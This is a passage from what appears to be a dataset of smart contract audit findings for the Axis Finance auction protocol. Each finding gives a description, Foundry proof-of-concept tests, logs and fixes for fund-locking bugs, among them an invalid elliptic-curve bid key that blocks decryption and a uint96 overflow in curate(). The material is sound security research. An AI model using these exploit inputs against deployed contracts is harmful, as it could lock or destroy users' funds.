revert Auction_WrongState(lotId_);\\n}\\n```\\n\\nSo `Auction creators` can cancel an `auction` when it concludes. Then the `capacity` becomes `0` and the `auction` status transitions to `Claimed`.\\n`Bidders` can not `refund` their `bids`.\\n```\\nfunction refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n) external override onlyInternal returns (uint96 refund) {\\n _revertIfLotConcluded(lotId_);\\n}\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\n\\nThe only way for `bidders` to reclaim their tokens is by calling the `claimBids` function. 
However, `bidders` can only claim `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n) {\\n _revertIfLotNotSettled(lotId_);\\n}\\n```\\n\\nTo `settle` the `auction`, the `auction` status should be `Decrypted`. This requires submitting the `private key`. The `auction` creator can not submit the `private key` or submit it without decrypting any `bids` by calling `submitPrivateKey(lotId, privateKey, 0)`. Then nobody can decrypt the `bids` using the `decryptAndSortBids` function which always reverts.\\n```\\nfunction decryptAndSortBids(uint96 lotId_, uint64 num_) external {\\n if (\\n auctionData[lotId_].status != Auction.Status.Created // @audit, here\\n || auctionData[lotId_].privateKey == 0\\n ) {\\n revert Auction_WrongState(lotId_);\\n }\\n\\n _decryptAndSortBids(lotId_, num_);\\n}\\n```\\n\\nAs a result, the `auction status` remains unchanged, preventing it from transitioning to `Settled`. This leaves the `bidders'` `quote` tokens locked in the `auction house`.\\nPlease add below test to the `test/modules/Auction/cancel.t.sol`.\\n```\\nfunction test_cancel() external whenLotIsCreated {\\n Auction.Lot memory lot = _mockAuctionModule.getLot(_lotId);\\n\\n console2.log(""lot.conclusion before ==> "", lot.conclusion);\\n console2.log(""block.timestamp before ==> "", block.timestamp);\\n console2.log(""isLive ==> "", _mockAuctionModule.isLive(_lotId));\\n\\n vm.warp(lot.conclusion - block.timestamp + 1);\\n console2.log(""lot.conclusion after ==> "", lot.conclusion);\\n console2.log(""block.timestamp after ==> "", block.timestamp);\\n console2.log(""isLive ==> "", _mockAuctionModule.isLive(_lotId));\\n\\n vm.prank(address(_auctionHouse));\\n _mockAuctionModule.cancelAuction(_lotId);\\n}\\n```\\n\\nThe log is\\n```\\nlot.conclusion before ==> 86401\\nblock.timestamp before ==> 1\\nisLive ==> true\\nlot.conclusion after ==> 86401\\nblock.timestamp after ==> 86401\\nisLive ==> 
false\\n```\\n","```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n- if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n+ if (lotData[lotId_].conclusion <= uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\n",Users' funds can be locked.,```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n +Bidders can not claim their bids if the auction creator claims the proceeds.,high,"Before the batch `auction` begins, the `auction` creator should `prefund` `base` tokens to the `auction` house. During the `auction`, `bidders` transfer `quote` tokens to the `auction` house. After the `auction` settles,\\n`Bidders` can claim their `bids` and either to receive `base` tokens or `retrieve` their `quote` tokens.\\nThe `auction creator` can receive the `quote` tokens and `retrieve` the remaining `base` tokens.\\nThere is no specific order for these two operations.\\nHowever, if the `auction creator` claims the `proceeds`, `bidders` can not claim their `bids` anymore. 
Consequently, their `funds` will remain locked in the `auction house`.\\nWhen the `auction creator` claims `Proceeds`, the `auction status` changes to `Claimed`.\\n```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nOnce the `auction status` has transitioned to `Claimed`, there is indeed no way to change it back to `Settled`.\\nHowever, `bidders` can only claim their `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n)\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n{\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_); // @audit, here\\n\\n return _claimBids(lotId_, bidIds_);\\n}\\n```\\n\\nPlease add below test to the `test/modules/auctions/claimBids.t.sol`.\\n```\\nfunction test_claimProceeds_before_claimBids()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT_UNSUCCESSFUL, _BID_AMOUNT_OUT_UNSUCCESSFUL)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n uint64 bidId = 1;\\n\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = bidId;\\n\\n // Call the function\\n vm.prank(address(_auctionHouse));\\n _module.claimProceeds(_lotId);\\n\\n\\n bytes memory err = abi.encodeWithSelector(EncryptedMarginalPriceAuctionModule.Auction_WrongState.selector, 
_lotId);\\n vm.expectRevert(err);\\n vm.prank(address(_auctionHouse));\\n _module.claimBids(_lotId, bidIds);\\n}\\n```\\n",Allow `bidders` to claim their `bids` even when the `auction status` is `Claimed`.,Users' funds could be locked.,"```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n" +Bidders' funds may become locked due to inconsistent price order checks in MaxPriorityQueue and the _claimBid function.,high,"In the `MaxPriorityQueue`, `bids` are ordered by decreasing `price`. We calculate the `marginal price`, `marginal bid ID`, and determine the `auction winners`. When a `bidder` wants to claim, we verify that the `bid price` of this `bidder` exceeds the `marginal price`. However, there's minor inconsistency: certain `bids` may have `marginal price` and a smaller `bid ID` than `marginal bid ID` and they are not actually `winners`. As a result, the `auction winners` and these `bidders` can receive `base` tokens. However, there is a finite supply of `base` tokens for `auction winners`. 
Early `bidders` who claim can receive `base` tokens, but the last `bidders` can not.\\nThe comparison for the order of `bids` in the `MaxPriorityQueue` is as follow: if `q1 * b2 < q2 * b1` then `bid (q2, b2)` takes precedence over `bid (q1, b1)`.\\n```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n\\nAnd in the `_calimBid` function, the `price` is checked directly as follow: if q * 10 ** baseDecimal / b >= marginal `price`, then this `bid` can be claimed.\\n```\\nfunction _claimBid(\\n uint96 lotId_,\\n uint64 bidId_\\n) internal returns (BidClaim memory bidClaim, bytes memory auctionOutput_) {\\n uint96 price = uint96(\\n bidData.minAmountOut == 0\\n ? 0 // TODO technically minAmountOut == 0 should be an infinite price, but need to check that later. Need to be careful we don't introduce a way to claim a bid when we set marginalPrice to type(uint96).max when it cannot be settled.\\n : Math.mulDivUp(uint256(bidData.amount), baseScale, uint256(bidData.minAmountOut))\\n );\\n uint96 marginalPrice = auctionData[lotId_].marginalPrice;\\n if (\\n price > marginalPrice\\n || (price == marginalPrice && bidId_ <= auctionData[lotId_].marginalBidId)\\n ) { }\\n}\\n```\\n\\nThe issue is that a `bid` with the `marginal price` might being placed after marginal `bid` in the `MaxPriorityQueue` due to rounding.\\n```\\nq1 * b2 < q2 * b1, but mulDivUp(q1, 10 ** baseDecimal, b1) = mulDivUp(q2, 10 ** baseDecimal, b2)\\n```\\n\\nLet me take an example. 
The `capacity` is `10e18` and there are `6 bids` ((4e18 + 1, 2e18) for first `bidder`, `(4e18 + 2, 2e18)` for the other `bidders`. The order in the `MaxPriorityQueue` is `(2, 3, 4, 5, `6`, 1)`. The `marginal bid ID` is `6`. The `marginal price` is `2e18` + 1. The `auction winners` are `(2, 3, 4, 5, 6)`. However, `bidder` 1 can also claim because it's `price` matches the `marginal price` and it has the smallest `bid ID`. There are only `10e18` `base` tokens, but all `6 bidders` require `2e18` `base` tokens. As a result, at least one `bidder` won't be able to claim `base` tokens, and his `quote` tokens will remain locked in the `auction house`.\\nThe Log is\\n```\\nmarginal price ==> 2000000000000000001\\nmarginal bid id ==> 6\\n\\npaid to bid 1 ==> 4000000000000000001\\npayout to bid 1 ==> 1999999999999999999\\n*****\\npaid to bid 2 ==> 4000000000000000002\\npayout to bid 2 ==> 2000000000000000000\\n*****\\npaid to bid 3 ==> 4000000000000000002\\npayout to bid 3 ==> 2000000000000000000\\n*****\\npaid to bid 4 ==> 4000000000000000002\\npayout to bid 4 ==> 2000000000000000000\\n*****\\npaid to bid 5 ==> 4000000000000000002\\npayout to bid 5 ==> 2000000000000000000\\n*****\\npaid to bid 6 ==> 4000000000000000002\\npayout to bid 6 ==> 2000000000000000000\\n```\\n\\nPlease add below test to the `test/modules/auctions/EMPA/claimBids.t.sol`\\n```\\nfunction test_claim_nonClaimable_bid()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(4e18 + 1, 2e18) // bidId = 1\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 2\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 3\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 4\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 5\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 6\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n EncryptedMarginalPriceAuctionModule.AuctionData memory auctionData = _getAuctionData(_lotId);\\n\\n console2.log('marginal price ==> ', 
auctionData.marginalPrice);\\n console2.log('marginal bid id ==> ', auctionData.marginalBidId);\\n console2.log('');\\n\\n for (uint64 i; i < 6; i ++) {\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = i + 1;\\n vm.prank(address(_auctionHouse));\\n (Auction.BidClaim[] memory bidClaims,) = _module.claimBids(_lotId, bidIds);\\n Auction.BidClaim memory bidClaim = bidClaims[0];\\n if (i > 0) {\\n console2.log('*****');\\n }\\n console2.log('paid to bid ', i + 1, ' ==> ', bidClaim.paid);\\n console2.log('payout to bid ', i + 1, ' ==> ', bidClaim.payout);\\n }\\n}\\n```\\n","In the `MaxPriorityQueue`, we should check the price: `Math.mulDivUp(q, 10 ** baseDecimal, b)`.",,"```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n" +"Overflow in curate() function, results in permanently stuck funds",high,"The `Axis-Finance` protocol has a curate() function that can be used to set a certain fee to a curator set by the seller for a certain auction. Typically, a curator is providing some service to an auction seller to help the sale succeed. This could be doing diligence on the project and `vouching` for them, or something simpler, such as listing the auction on a popular interface. A lot of memecoins have a big supply in the trillions, for example SHIBA INU has a total supply of nearly 1000 trillion tokens and each token has 18 decimals. With a lot of new memecoins emerging every day due to the favorable bullish conditions and having supply in the trillions, it is safe to assume that such protocols will interact with the `Axis-Finance` protocol. 
Creating auctions for big amounts, and promising big fees to some celebrities or influencers to promote their project. The funding parameter in the Routing struct is of type `uint96`\\n```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n\\nThe max amount of tokens with 18 decimals a `uint96` variable can hold is around 80 billion. The problem arises in the curate() function, If the auction is prefunded, which all batch auctions are( a normal FPAM auction can also be prefunded), and the amount of prefunded tokens is big enough, close to 80 billion tokens with 18 decimals, and the curator fee is for example 7.5%, when the `curatorFeePayout` is added to the current funding, the funding will overflow.\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nGist After following the steps in the above mentioned gist, add the following test to the `AuditorTests.t.sol`\\n```\\nfunction test_CuratorFeeOverflow() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = """";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, 100_000_000_000e18);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18),\\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(""""),\\n derivativeType: toKeycode(""""),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 
1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(owner);\\n FeeManager.FeeType type_ = FeeManager.FeeType.MaxCurator;\\n uint48 fee = 7_500; // 7.5% max curator fee\\n auctionHouse.setFee(keycode, type_, fee);\\n vm.stopPrank();\\n\\n vm.startPrank(curator);\\n uint96 fundingBeforeCuratorFee;\\n uint96 fundingAfterCuratorFee;\\n (,fundingBeforeCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized before curator fee is set: "", fundingBeforeCuratorFee/1e18);\\n auctionHouse.setCuratorFee(keycode, fee);\\n bytes memory callbackData_ = """";\\n auctionHouse.curate(0, callbackData_);\\n (,fundingAfterCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized after curator fee is set: "", fundingAfterCuratorFee/1e18);\\n console2.log(""Balance of base token of the auction house: "", mockBaseToken.balanceOf(address(auctionHouse))/1e18);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before curator fee is set: 75000000000\\n Here is the funding normalized after curator fee is set: 1396837485\\n Balance of base token of the auction house: 80625000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_CuratorFeeOverflow`","Either remove the unchecked block\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nso that when overflow occurs, the transaction will revert, or better yet also change the funding variable type from `uint96` to `uint256` this way sellers can create big enough auctions, and provide sufficient curator fee in order to bootstrap their protocol successfully .","If there is an overflow occurs in the curate() function, a big portion of the tokens will be stuck in the `Axis-Finance` protocol forever, as there is no way for them to be 
withdrawn, either by an admin function, or by canceling the auction (if an auction has started, only FPAM auctions can be canceled), as the amount returned is calculated in the following way\\n```\\n if (routing.funding > 0) {\\n uint96 funding = routing.funding;\\n\\n // Set to 0 before transfer to avoid re-entrancy\\n routing.funding = 0;\\n\\n // Transfer the base tokens to the appropriate contract\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n funding,\\n false\\n );\\n // rest of code\\n }\\n```\\n",```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n +It is possible to DoS batch auctions by submitting invalid AltBn128 points when bidding,high,"Bidders can submit invalid points for the AltBn128 elliptic curve. The invalid points will make the decrypting process always revert, effectively DoSing the auction process, and locking funds forever in the protocol.\\nAxis finance supports a sealed-auction type of auctions, which is achieved in the Encrypted Marginal Price Auction module by leveraging the ECIES encryption scheme. Axis will specifically use a simplified ECIES implementation that uses the AltBn128 curve, which is a curve with generator point (1,2) and the following formula:\\n$$ y^2 = x^3 + 3 $$\\nBidders will submit encrypted bids to the protocol. 
One of the parameters required to be submitted by the bidders so that bids can later be decrypted is a public key that will be used in the EMPA decryption process:\\n```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n\\nAs shown in the code snippet, bidders will submit a `bidPubKey`, which consists in an x and y coordinate (this is actually the public key, which can be represented as a point with x and y coordinates over an elliptic curve).\\nThe `bidPubKey` point will then be validated by the ECIES library's `isValid()` function. Essentially, this function will perform three checks:\\nVerify that the point provided is on the AltBn128 curve\\nEnsure the x and y coordinates of the point provided don't correspond to the generator point (1, 2)\\nEnsure that the x and y coordinates of the point provided don't corrspond to the point at infinity (0,0)\\n```\\n// ECIES.sol\\n\\nfunction isOnBn128(Point memory p) public pure returns (bool) {\\n // check if the provided point is on the bn128 curve y**2 = x**3 + 3, which has generator point (1, 2)\\n return _fieldmul(p.y, p.y) == _fieldadd(_fieldmul(p.x, _fieldmul(p.x, p.x)), 3);\\n }\\n \\n /// @notice Checks whether a point is valid. 
We consider a point valid if it is on the curve and not the generator point or the point at infinity.\\n function isValid(Point memory p) public pure returns (bool) { \\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n }\\n```\\n\\nAlthough these checks are correct, one important check is missing in order to consider that the point is actually a valid point in the AltBn128 curve.\\nAs a summary, ECC incorporates the concept of finite fields. Essentially, the elliptic curve is considered as a square matrix of size pxp, where p is the finite field (in our case, the finite field defined in Axis' `ECIES.sol` library is stord in the `FIELD_MODULUS` constant with a value of 21888242871839275222246405745257275088696311157297823662689037894645226208583). The curve equation then takes this form:\\n$$ y2 = x^3 + ax + b (mod p) $$\\nNote that because the function is now limited to a field of pxp, any point provided that has an x or y coordinate greater than the modulus will fall outside of the matrix, thus being invalid. In other words, if x > p or y > p, the point should be considered invalid. However, as shown in the previous snippet of code, this check is not performed in Axis' ECIES implementation.\\nThis enables a malicious bidder to provide an invalid point with an x or y coordinate greater than the field, but that still passes the checked conditions in the ECIES library. The `isValid()` check will pass and the bid will be successfully submitted, although the public key is theoretically invalid.\\nThis leads us to the second part of the attack. When the auction concludes, the decryption process will begin. The process consists in:\\nCalling the `decryptAndSortBids()` function. This will trigger the internal `_decryptAndSortBids()` function. It is important to note that this function will only set the status of the auction to `Decrypted` if ALL the bids submitted have been decrypted. 
Otherwise, the auction can't continue.\\n`_decryptAndSortBids()` will call the internal `_decrypt()` function for each of the bids submittted\\n`_decrypt()` will finally call the ECIES' `decrypt()` function so that the bid can be decrypted:\\n// EMPAM.sol\\n\\nfunction _decrypt(\\n uint96 lotId_,\\n uint64 bidId_,\\n uint256 `privateKey_`\\n ) internal view returns (uint256 amountOut) {\\n // Load the encrypted bid data\\n EncryptedBid memory encryptedBid = encryptedBids[lotId_][bidId_];\\n\\n // Decrypt the message\\n // We expect a salt calculated as the keccak256 hash of lot id, bidder, and amount to provide some (not total) uniqueness to the encryption, even if the same shared secret is used\\n Bid storage bidData = bids[lotId_][bidId_];\\n uint256 message = ECIES.decrypt(\\n encryptedBid.encryptedAmountOut,\\n `encryptedBid.bidPubKey`, \\n `privateKey_`, \\n uint256(keccak256(abi.encodePacked(lotId_, bidData.bidder, bidData.amount))) // @audit-issue [MEDIUM] - Missing bidId in salt creates the edge case where a bid susceptible of being discovered if a user places two bids with the same input amount. Because the same key will be used when performing the XOR, the symmetric key can be extracted, thus potentially revealing the bid amounts.\\n ); \\n \\n \\n ...\\n } \\nAs shown in the code snippet, one of the parameters passed to the `ECIES.decrypt()` function will be the `encryptedBid.bidPubKey` (the invalid point provided by the malicious bidder). 
As we can see, the first step performed by `ECIES.decrypt()` will be to call the `recoverSharedSecret()` function, passing the invalid public key (ciphertextPubKey_) and the auction's global `privateKey_` as parameter:\\n// ECIES.sol\\n\\nfunction decrypt(\\n uint256 ciphertext_,\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`,\\n uint256 salt_\\n ) public view returns (uint256 message_) {\\n // Calculate the shared secret\\n // Validates the ciphertext public key is on the curve and the private key is valid\\n uint256 sharedSecret = recoverSharedSecret(ciphertextPubKey_, privateKey_);\\n\\n ...\\n }\\n \\n function recoverSharedSecret(\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`\\n ) public view returns (uint256) {\\n ...\\n \\n Point memory p = _ecMul(ciphertextPubKey_, privateKey_);\\n\\n return p.x;\\n }\\n \\n function _ecMul(Point memory p, uint256 scalar) private view returns (Point memory p2) {\\n (bool success, bytes memory output) =\\n address(0x07).staticcall{gas: 6000}(abi.encode(p.x, p.y, scalar));\\n\\n if (!success || output.length == 0) revert(""ecMul failed."");\\n\\n p2 = abi.decode(output, (Point));\\n }\\nAmong other things, `recoverSharedSecret()` will execute a scalar multiplication between the invalid public key and the global private key via the `ecMul` precompile. This is where the denial of servide will take place.\\nThe ecMul precompile contract was incorporated in EIP-196. Checking the EIP's exact semantics section, we can see that inputs will be considered invalid if “… any of the field elements (point coordinates) is equal or larger than the field modulus p, the contract fails”. 
Because the point submitted by the bidder had one of the x or y coordinates bigger than the field modulus p (because Axis never validated that such value was smaller than the field), the call to the ecmul precompile will fail, reverting with the “ecMul failed.” error.\\nBecause the decryption process expects ALL the bids submitted for an auction to be decrypted prior to actually setting the auctions state to `Decrypted`, if only one bid decryption fails, the decryption process won't be completed, and the whole auction process (decrypting, settling, …) won't be executable because the auction never reaches the `Decrypted` state.\\nProof of Concept\\nThe following proof of concept shows a reproduction of the attack mentioned above. In order to reproduce it, following these steps:\\nInside `EMPAModuleTest.sol`, change the `_createBidData()` function so that it uses the (21888242871839275222246405745257275088696311157297823662689037894645226208584, 2) point instead of the `_bidPublicKey` variable. 
This is a valid point as per Axis' checks, but it is actually invalid given that the x coordinate is greater than the field modulus:\\n`// EMPAModuleTest.t.sol\\n\\nfunction _createBidData(\\n address bidder_,\\n uint96 amountIn_,\\n uint96 amountOut_\\n ) internal view returns (bytes memory) {\\n uint256 encryptedAmountOut = _encryptBid(_lotId, bidder_, amountIn_, amountOut_);\\n \\n- return abi.encode(encryptedAmountOut, _bidPublicKey);\\n+ return abi.encode(encryptedAmountOut, Point({x: 21888242871839275222246405745257275088696311157297823662689037894645226208584, y: 2}));\\n } `\\nPaste the following code in moonraker/test/modules/auctions/EMPA/decryptAndSortBids.t.sol:\\n`// decryptAndSortBids.t.sol\\n\\nfunction testBugdosDecryption()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenLotHasConcluded \\n givenPrivateKeyIsSubmitted\\n {\\n\\n vm.expectRevert(""ecMul failed."");\\n _module.decryptAndSortBids(_lotId, 1);\\n\\n }`\\nRun the test inside `moonraker` with the following command: `forge test --mt testBugdosDecryption`","Ensure that the x and y coordinates are smaller than the field modulus inside the `ECIES.sol` `isValid()` function, adding the `p.x < FIELD_MODULUS && p.y < FIELD_MODULUS` check so that invalid points can't be submitted:\\n```\\n// ECIES.sol\\n\\nfunction isValid(Point memory p) public pure returns (bool) { \\n// Remove the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n// Add the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0) && (p.x < FIELD_MODULUS && p.y < FIELD_MODULUS); \\n }\\n```\\n","High. A malicious bidder can effectively DoS the decryption process, which will prevent all actions in the protocol from being executed. 
This attack will make all the bids and prefunded auction funds remain stuck forever in the contract, because all the functions related to the post-concluded auction steps expect the bids to be first decrypted.","```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n" +Downcasting to uint96 can cause assets to be lost for some tokens,high,"Downcasting to uint96 can cause assets to be lost for some tokens\\nAfter summing the individual bid amounts, the total bid amount is downcasted to uint96 without any checks\\n```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n\\nuint96 can be overflowed for multiple well traded tokens:\\nEg:\\nshiba inu : current price = $0.00003058 value of type(uint96).max tokens ~= 2^96 * 0.00003058 / 10^18 == 2.5 million $\\nHence auctions that receive more than type(uint96).max amount of tokens will be downcasted leading to extreme loss for the auctioner",Use a higher type or warn the user's of the limitations on the auction sizes,The auctioner will suffer extreme loss in situations where the auctions bring in >uint96 amount of tokens,```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n +Incorrect `prefundingRefund` calculation will disallow claiming,high,"Incorrect `prefundingRefund` calculation will lead to underflow and hence disallowing claiming\\nThe `prefundingRefund` variable calculation inside the `claimProceeds` function is incorrect\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata 
callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n\\nHere `sold` is the total base quantity that has been `sold` to the bidders. Unlike required, the `routing.funding` variable need not be holding `capacity + (0,curator fees)` since it is decremented every time a payout of a bid is claimed\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (bidClaim.payout > 0) {\\n \\n // rest of code\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= bidClaim.payout;\\n }\\n```\\n\\nExample\\nCapacity = 100 prefunded, hence routing.funding == 100 initially Sold = 90 and no partial fill/curation All bidders claim before the claimProceed function is invoked Hence routing.funding = 100 - 90 == 10 When claimProceeds is invoked, underflow and revert:\\nuint96 prefundingRefund = routing.funding + payoutSent_ - sold_ == 10 + 0 - 90",Change the calculation to:\\n```\\nuint96 prefundingRefund = capacity - sold_ + curatorFeesAdjustment (how much was prefunded initially - how much will be sent out based on capacity - sold)\\n```\\n,Claim proceeds function is broken. 
Sellers won't be able to receive the proceeds,"```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n" +If pfBidder gets blacklisted the settlement process would be broken and every other bidder and the seller would lose their funds,medium,"During batch auction settlement, the bidder whose bid was partially filled gets the refund amount in quote tokens and his payout in base immediately. If quote or base is a token with blacklist functionality (e.g. 
